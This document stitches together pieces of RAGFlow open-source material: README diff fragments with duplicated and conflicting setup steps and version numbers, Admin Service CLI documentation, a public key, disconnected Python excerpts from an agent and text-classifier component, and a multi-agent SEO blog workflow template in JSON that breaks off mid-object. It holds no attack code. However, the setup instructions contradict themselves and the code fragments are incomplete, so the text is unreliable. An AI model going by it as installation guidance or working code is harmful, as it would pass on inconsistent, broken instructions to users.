| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any size, combining LLMs (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
[RAGFlow](https://ragflow.io/) is a leading open-source RAG (Retrieval-Augmented Generation) engine that fuses cutting-edge RAG technology with Agent capabilities to create a superior context layer for LLMs. It offers an optimized RAG workflow adaptable to enterprises of any scale. Powered by a converged context engine and pre-built Agent templates, RAGFlow enables developers to transform complex data into high-fidelity, production-ready AI systems with exceptional efficiency and precision.
## 🎮 Demo
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
@ -133,80 +148,99 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Start up the server
1. Ensure `vm.max_map_count` >= 262144:
1. Ensure `vm.max_map_count` >= 262144:
> To check the value of `vm.max_map_count`:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> If necessary, reset `vm.max_map_count` to a value of at least 262144:
>
> ```bash
> # In this case, set it to 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> This change will be reset after a system reboot. To make the change permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf**:
>
> ```bash
> vm.max_map_count=262144
> ```
> To check the value of `vm.max_map_count`:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> If necessary, reset `vm.max_map_count` to a value of at least 262144:
>
> ```bash
> # In this case, set it to 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> This change will be reset after a system reboot. To make the change permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf**:
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, follow [this guide](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image compatible with your system.
3. Start up the server using the pre-built Docker images:
> The command below downloads the `v0.22.1` edition of the RAGFlow Docker image. See the following table for descriptions of the different RAGFlow editions. To download a RAGFlow edition different from `v0.22.1`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server.
> The command below downloads the `v0.17.0-slim` edition of the RAGFlow Docker image. See the following table for descriptions of the different RAGFlow editions. To download a RAGFlow edition different from `v0.17.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0` for the full edition `v0.17.0`.
```bash
$ cd ragflow/docker
```bash
$ cd ragflow/docker
$ docker compose -f docker-compose.yml up -d
```
# git checkout v0.22.1
# Optional: use a stable tag (see releases: https://github.com/infiniflow/ragflow/releases)
# This step ensures that the entrypoint.sh file in the code matches the Docker image version.
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
> Starting with `v0.22.0`, we ship only the slim edition and no longer append the **-slim** suffix to the image tags.
* Running on all addresses (0.0.0.0)
```
4. Check the server status after starting it:
> If you skip this confirmation step and access RAGFlow directly, your browser may show a `network anormal` error because, at that moment, your RAGFlow may not be fully initialized.
```bash
$ docker logs -f docker-ragflow-cpu-1
```
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
_The following output confirms a successful launch of the system:_
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**without** the port number), because the default HTTP port `80` can be omitted when using the default configuration.
```bash
____ ___ ______ ______ __
/ __ \ / | / ____// ____// /____ _ __
/ /_/ // /| | / / __ / /_ / // __ \| | /| / /
/ _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
/_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
* Running on all addresses (0.0.0.0)
```
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
> If you skip this confirmation step and access RAGFlow directly, your browser may show a `network anormal` error because, at that moment, your RAGFlow may not be fully initialized.
>
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**without** the port number), because the default HTTP port `80` can be omitted when using the default configuration.
>
6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
>
_The show is on!_
@ -237,9 +271,9 @@ RAGFlow uses Elasticsearch by default to store full text and vector
```bash
$ docker compose -f docker/docker-compose.yml down -v
```
Note: `-v` will delete the container volumes, and the existing data will be erased.
2. Set `DOC_ENGINE` in **docker/.env** to `infinity`.
3. Start the containers:
```bash
@ -247,44 +281,34 @@ RAGFlow uses Elasticsearch by default to store full text and vector
```
> [!WARNING]
> Switching to Infinity on a Linux/arm64 machine is not yet officially supported.
> Switching to Infinity on a Linux/arm64 machine is not yet officially supported.
## 🔧 Build a Docker image without embedding models
## 🔧 Build a Docker image
This image is approximately 2 GB in size and relies on external LLM and embedding services.
Admin Service is a dedicated management component designed to monitor, maintain, and administrate the RAGFlow system. It provides comprehensive tools for ensuring system stability, performing operational tasks, and managing users and permissions efficiently.
The service offers real-time monitoring of critical components, including the RAGFlow server, Task Executor processes, and dependent services such as MySQL, Infinity, Elasticsearch, Redis, and MinIO. It automatically checks their health status, resource usage, and uptime, and performs restarts in case of failures to minimize downtime.
For user and system management, it supports listing, creating, modifying, and deleting users and their associated resources like knowledge bases and Agents.
Built with scalability and reliability in mind, the Admin Service ensures smooth system operation and simplifies maintenance workflows.
It consists of a server-side Service and a command-line client (CLI), both implemented in Python. User commands are parsed using the Lark parsing toolkit.
- **Admin Service**: A backend service that interfaces with the RAGFlow system to execute administrative operations and monitor its status.
- **Admin CLI**: A command-line interface that allows users to connect to the Admin Service and issue commands for system management.
### Starting the Admin Service
#### Launching from source code
1. Before starting the Admin Service, make sure the RAGFlow system is already running.
2. Launch from source code:
```bash
python admin/server/admin_server.py
```
The service will start and listen for incoming connections from the CLI on the configured port.
#### Using docker image
1. Before startup, configure the `docker-compose.yml` file to enable the admin server:
```yaml
command:
- --enable-adminserver
```
2. Start the containers. The service will start and listen for incoming connections from the CLI on the configured port.
### Using the Admin CLI
1. Ensure the Admin Service is running.
2. Install ragflow-cli.
```bash
pip install ragflow-cli==0.22.1
```
3. Launch the CLI client:
```bash
ragflow-cli -h 127.0.0.1 -p 9381
```
You will be prompted to enter the superuser's password to log in.
The default password is `admin`.
**Parameters:**
- `-h`: RAGFlow admin server host address
- `-p`: RAGFlow admin server port
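Before launching the CLI, it can help to confirm that something is listening on the host and port you plan to pass to `-h` and `-p`. The following is a minimal sketch using only the Python standard library; the function name `admin_service_reachable` is hypothetical and not part of `ragflow-cli`, and a successful TCP connection only shows that the port is open, not that the Admin Service is healthy.

```python
import socket


def admin_service_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to (host, port) succeeds within timeout."""
    try:
        # create_connection resolves the host and opens a TCP socket.
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and resolution failures.
        return False
```

For the example invocation above, the call would be `admin_service_reachable("127.0.0.1", 9381)`.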
## Supported Commands
Commands are case-insensitive and must be terminated with a semicolon (`;`).
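The two rules above (case-insensitive keywords, mandatory trailing semicolon) can be illustrated with a small pre-check. This is only a sketch: the real CLI parses commands with Lark, whereas `normalize_command` below is a hypothetical helper that upper-cases everything outside quoted strings and rejects input without a terminating `;`.

```python
def normalize_command(raw: str) -> str:
    """Check the trailing semicolon and upper-case text outside quoted strings.

    Quoted arguments (for example usernames) are left untouched.
    """
    text = raw.strip()
    if not text.endswith(";"):
        raise ValueError("command must be terminated with a semicolon (;)")
    body = text[:-1].strip()
    out = []
    quote = None  # the quote character currently open, if any
    for ch in body:
        if quote:
            out.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            out.append(ch)
        else:
            out.append(ch.upper())
    if quote:
        raise ValueError("unterminated quoted string")
    return "".join(out) + ";"
```

With this helper, `list users;` and `LIST USERS;` normalize to the same string, while a quoted username keeps its original case.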
### Service Management Commands
- `LIST SERVICES;`
- Lists all available services within the RAGFlow system.
- `SHOW SERVICE <id>;`
- Shows detailed status information for the service identified by `<id>`.
### User Management Commands
- `LIST USERS;`
- Lists all users known to the system.
- `SHOW USER '<username>';`
- Shows details and permissions for the specified user. The username must be enclosed in single or double quotes.
- `CREATE USER <username> <password>;`
- Creates a user with the given username and password. The username and password must be enclosed in single or double quotes.
- `DROP USER '<username>';`
- Removes the specified user from the system. Use with caution.
- `ALTER USER PASSWORD '<username>' '<new_password>';`
- Changes the password for the specified user.
- `ALTER USER ACTIVE <username> <on/off>;`
- Sets the specified user to active (`on`) or inactive (`off`).
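When scripting user management, the command strings can be assembled programmatically. The sketch below is an assumption-laden illustration: the helper names are hypothetical, arguments are assumed to be separated by a single space, and because the escaping rules for quotes inside a value are not described here, the helper simply rejects such values.

```python
def quote_arg(value: str) -> str:
    """Wrap value in single quotes; reject values that contain a quote character."""
    if "'" in value or '"' in value:
        raise ValueError("quote characters are not handled by this sketch")
    return f"'{value}'"


def create_user_cmd(username: str, password: str) -> str:
    """Build a CREATE USER command string."""
    return f"CREATE USER {quote_arg(username)} {quote_arg(password)};"


def alter_password_cmd(username: str, new_password: str) -> str:
    """Build an ALTER USER PASSWORD command string."""
    return f"ALTER USER PASSWORD {quote_arg(username)} {quote_arg(new_password)};"


def drop_user_cmd(username: str) -> str:
    """Build a DROP USER command string."""
    return f"DROP USER {quote_arg(username)};"
```

Each helper returns text that can be pasted into the CLI prompt; none of them talks to the Admin Service directly.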
### Data and Agent Commands
- `LIST DATASETS OF '<username>';`
- Lists the datasets associated with the specified user.
- `LIST AGENTS OF '<username>';`
- Lists the agents associated with the specified user.
### Meta-Commands
Meta-commands are prefixed with a backslash (`\`).
- `\?` or `\help`
- Shows help information for the available commands.
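One way to picture the split between meta-commands and regular commands is a dispatcher that looks at the first character. This is a hypothetical sketch, not the CLI's actual logic; `classify_input` and `is_help` are illustrative names, and matching is done on the exact spellings `\?` and `\help` listed above.

```python
def classify_input(line: str) -> tuple[str, str]:
    """Return ("meta", name) for backslash-prefixed input, else ("command", text)."""
    text = line.strip()
    if text.startswith("\\"):
        return ("meta", text[1:])
    return ("command", text)


def is_help(line: str) -> bool:
    """True when the input is one of the two help meta-commands."""
    kind, name = classify_input(line)
    return kind == "meta" and name in {"?", "help"}
```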
pub='-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArq9XTUSeYr2+N1h3Afl/z8Dse/2yD0ZGrKwx+EEEcdsBLca9Ynmx3nIB5obmLlSfmskLpBo0UACBmB5rEjBp2Q2f3AG3Hjd4B+gNCG6BDaawuDlgANIhGnaTLrIqWrrcm4EMzJOnAOI1fgzJRsOOUEfaS318Eq9OVO3apEyCCt0lOQK6PuksduOjVxtltDav+guVAA068NrPYmRNabVKRNLJpL8w4D44sfth5RvZ3q9t+6RTArpEtc5sh5ChzvqPOzKGMXW83C95TxmXqpbK6olN4RevSfVjEAgCydH6HN6OhtOQEcnrU97r9H0iZOWwbw3pVrZiUkuRD1R56Wzs2wIDAQAB\n-----END PUBLIC KEY-----'
description="Admin Service's client of [RAGFlow](https://github.com/infiniflow/ragflow). The Admin Service provides user management and system monitoring. "
# self.toolcall_session.get_tool_obj(name).add2system_prompt(f"The chat history with other agents are as following: \n" + self.get_useful_memory(user_request, str(args["user_prompt"]),user_defined_prompt))
raise TypeError(f"List should be returned, but `{functions}`")
for f in functions:
    if not isinstance(f, dict):
        raise TypeError(f"An object type should be returned, but `{f}`")
with ThreadPoolExecutor(max_workers=5) as executor:
    thr = []
    for func in functions:
        name = func["name"]
        args = func["arguments"]
        if name == COMPLETE_TASK:
            append_user_content(hist, f"Respond with a formal answer. FORGET(DO NOT mention) about `{COMPLETE_TASK}`. The language for the response MUST be as the same as the first user request.\n")
logging.exception(msg=f"Wrong JSON argument format in LLM ReAct response: {e}")
e = f"\nTool call error, please correct the input parameter of response format and call it again.\n *** Exception ***\n{e}"
append_user_content(hist, str(e))
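The fragments above validate the model's function-call list and then fan the calls out to a thread pool. A self-contained sketch of that pattern follows. It is not the RAGFlow implementation: `validate_calls`, `run_tool_calls`, and the plain `tools` dictionary of callables are assumptions introduced for illustration, and only the two `TypeError` messages and `max_workers=5` are taken from the code above.

```python
import json
from concurrent.futures import ThreadPoolExecutor


def validate_calls(functions):
    """Mirror the type checks above: a list of dicts is expected."""
    if not isinstance(functions, list):
        raise TypeError(f"List should be returned, but `{functions}`")
    for f in functions:
        if not isinstance(f, dict):
            raise TypeError(f"An object type should be returned, but `{f}`")
    return functions


def run_tool_calls(raw: str, tools: dict, max_workers: int = 5) -> list:
    """Parse a JSON list of {"name", "arguments"} calls and run them concurrently.

    Results are returned in the same order as the calls.
    """
    functions = validate_calls(json.loads(raw))
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        # Submit every call first so they can overlap, then collect in order.
        futures = [
            (func["name"], executor.submit(tools[func["name"]], **func["arguments"]))
            for func in functions
        ]
        return [(name, fut.result()) for name, fut in futures]
```

Collecting results in submission order keeps the follow-up prompt deterministic even when individual tools finish at different times.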
logging.warning(f"Exceed max rounds: {self._param.max_rounds}")
final_instruction = f"""
{user_request}
IMPORTANT: You have reached the conversation limit. Based on ALL the information and research you have gathered so far, please provide a DIRECT and COMPREHENSIVE final answer to the original request.
Instructions:
1. SYNTHESIZE all information collected during this conversation
2. Provide a COMPLETE response using existing data - do not suggest additional research
3. Structure your response as a FINAL DELIVERABLE, not a plan
4. If information is incomplete, state what you found and provide the best analysis possible with available data
5. DO NOT mention conversation limits or suggest further steps
6. Focus on delivering VALUE with the information already gathered
Respond immediately with your final comprehensive answer.
"""
if self.check_if_canceled("Agent final instruction"):
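The max-rounds fallback above can be summarized as: loop up to a limit, and if the agent has not finished, make one more call with a final instruction appended to the original request. The sketch below shows that control flow under stated assumptions. `run_with_round_limit` and the `step` callback (which returns a `(done, text)` pair) are hypothetical, and the final instruction is shortened from the prompt above.

```python
def run_with_round_limit(step, user_request: str, max_rounds: int) -> str:
    """Call step(prompt) up to max_rounds times, then force a final answer.

    step returns (done, text). If the limit is reached without done=True,
    one extra call is made with a final instruction appended to the request.
    """
    prompt = user_request
    for _ in range(max_rounds):
        done, text = step(prompt)
        if done:
            return text
        prompt = text  # feed the intermediate result into the next round
    final_instruction = (
        f"{user_request}\n"
        "IMPORTANT: You have reached the conversation limit. "
        "Provide a DIRECT and COMPREHENSIVE final answer "
        "using the information gathered so far."
    )
    _, text = step(final_instruction)
    return text
```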
You're a text classifier. You need to categorize the user’s questions into {} categories,
namely: {}
Here's description of each category:
{}
self.sys_prompt = """
You are an advanced classification system that categorizes user questions into specific types. Analyze the input question and classify it into ONE of the following categories:
{}
You could learn from the following examples:
{}
You could learn from the above examples.
Just mention the category names, no need for any additional words.
Here's description of each category:
-{}
---- Real Data ----
{}
""".format(
len(self.category_description.keys()),
"/".join(list(self.category_description.keys())),
"\n".join(descriptions),
"-".join(cate_lines),
chat_hist
---- Instructions ----
- Consider both explicit mentions and implied context
- Prioritize the most specific applicable category
- Return only the category name without explanations
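The prompt above is filled with positional `str.format` arguments built from the category descriptions. A reduced sketch of that assembly follows. The function name `build_classifier_prompt`, the shortened template, and the `examples` list are assumptions for illustration; only the general approach (count, `/`-joined names, newline-joined descriptions) follows the code above.

```python
def build_classifier_prompt(category_description: dict, examples: list) -> str:
    """Fill a classification prompt from category names, descriptions, and examples."""
    descriptions = [
        f"Category: {name}\nDescription: {desc}"
        for name, desc in category_description.items()
    ]
    template = (
        "Classify the question into ONE of these {} categories: {}\n"
        "Here's description of each category:\n{}\n"
        "You could learn from the following examples:\n{}\n"
        "Return only the category name without explanations."
    )
    # Positional arguments are substituted once, so braces inside a
    # description are not re-interpreted as placeholders.
    return template.format(
        len(category_description),
        "/".join(category_description),
        "\n".join(descriptions),
        "\n".join(f"- {e}" for e in examples),
    )
```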
return "⌛Give me a moment—starting from: \n\n" + re.sub(r"(User's query:|[\\]+)", '', msg[-1]['content'], flags=re.DOTALL) + "\n\nI’ll figure out our best next move."
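The `re.sub` call above removes two things from the last message: the literal label `User's query:` and any run of backslashes. A small standalone sketch of the same pattern is shown here; the wrapper name `strip_query_prefix` is hypothetical.

```python
import re


def strip_query_prefix(content: str) -> str:
    """Remove the literal "User's query:" label and any run of backslashes."""
    return re.sub(r"(User's query:|[\\]+)", "", content, flags=re.DOTALL)
```

Since the pattern contains no `.`, the `re.DOTALL` flag does not change what is matched here. Note that the space after the label is kept, so callers may want to strip the result.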
"en":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI “writers”, where each agent plays a specialized role — just like a real editorial team.",
"de":"Dies ist eine Multi-Agenten-Version des Workflows zur Erstellung von SEO-Blogs. Sie simuliert ein kleines Team von KI-„Autoren“, in dem jeder Agent eine spezielle Rolle übernimmt – genau wie in einem echten Redaktionsteam.",
"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. 
Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Agent",
"id":"Agent:SlickSpidersTurn",
"name":"Outline Agent",
"params":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title 
A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:IcyPawsRescue",
"name":"Body Agent",
"params":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:TenderAdsAllow",
"name":"Editor Agent",
"params":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"begin"
]
},
"Message:ModernSwansThrow":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
}
},
"upstream":[
"Agent:LuckyApplesGrab"
]
},
"begin":{
"downstream":[
"Agent:LuckyApplesGrab"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label":"Begin",
"name":"begin"
},
"dragging":false,
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":38.19445084117184,
"y":183.9781832844475
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
